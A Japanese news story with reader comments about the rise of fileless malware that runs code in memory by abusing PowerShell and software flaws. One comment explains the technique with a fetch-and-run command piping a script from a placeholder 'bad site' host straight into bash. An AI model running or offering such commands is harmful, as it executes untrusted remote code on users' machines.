不正なコードをファイルに書き込むことなく実行するマルウェアが増加傾向 6
ストーリー by hylom
高度化する手法 部門より
高度化する手法 部門より
不正なコードをファイルに書き込むことなしに実行するようなマルウェアが近年増加傾向にあるという。こうしたマルウェアはその痕跡がファイルとしては残らないため、既存のセキュリティソフトでは検出が難しいそうだ(ITmedia)。
こういった攻撃手法は「ファイルレス攻撃」などと呼ばれており、プログラムの脆弱性を悪用して不正なコードを直接メモリ内に展開させて実行させたり、攻撃対象内にインストールされているPowerShellなどのツールを悪用することでその活動が検出されることを防ぐという。また、一時的にファイルを書き込むも、その後そのファイルを削除する、もしくはその内容を0で上書きするような挙動を行うのもあるという(McAfeeの「ファイルレス攻撃解説」ホワイトペーパー)。
PowerShellがよく悪用されるのは、メモリ上にダウンロードしたコードを直接実行する仕組みがサポートされているからだそうだ。また、多くの場合システムが再起動されるとこれらマルウェアは活動が止まるが、レジストリやファイルシステム以外のストレージを活用することで持続的に攻撃を行うものもあるという。なお、PowerShellが攻撃に悪用される可能性については以前より指摘されていた(ITmediaの2017年記事)。
エ〇 (スコア:2)
痕跡が残らないので安心だな。
Re:エ〇 (スコア:1)
つ[揮発性ストレージ]
メモリ上にダウンロードしたコードを直接実行 (スコア:0)
どういうことですかね?
bash -c "echo foo" みたいな話?
Re: (スコア:0)
Invoke-Expression(略して iex)というコマンドがあります。
chocolateyというhomebrew
のパクりの出来損ないのようなユーティリティのインストールでも使われておりhttps://chocolatey.org/install [chocolatey.org]
何となくニュアンスはつかめると思いますが、ネットからDLしたスクリプトをそのまま実行出来てしまうという
凶悪な機能です。
狂ってる。
# WIndows/Microsoftにあまり関わらない人生を送れててよかった...w
Re: (スコア:0)
PowerShellというより.NETの機能として、メモリ上の.NETモジュールのバイナリをロードできるので、それのことかな。
本体のマルウェアをネットワークからダウンロードしてメモリ上に展開し、.NETランタイムにロードすることで、
ディスクに書き込まずに悪意あるプログラムを実行できる。
PowerShellは.NETランタイムで動作しているので、読み込まれたモジュールを直接呼び出せる。
リンクされているMcFeeのホワイトペーパーによれば、
「検知にファイルベースのアプローチをするほとんどのセキュリティソリューションは動作監視をしていたとしてもファイルレス攻撃を検知できない」
とある。
Re: (スコア:0)
curl -s http://waruisite.example.com/ [example.com] | bash -s の方が近そう。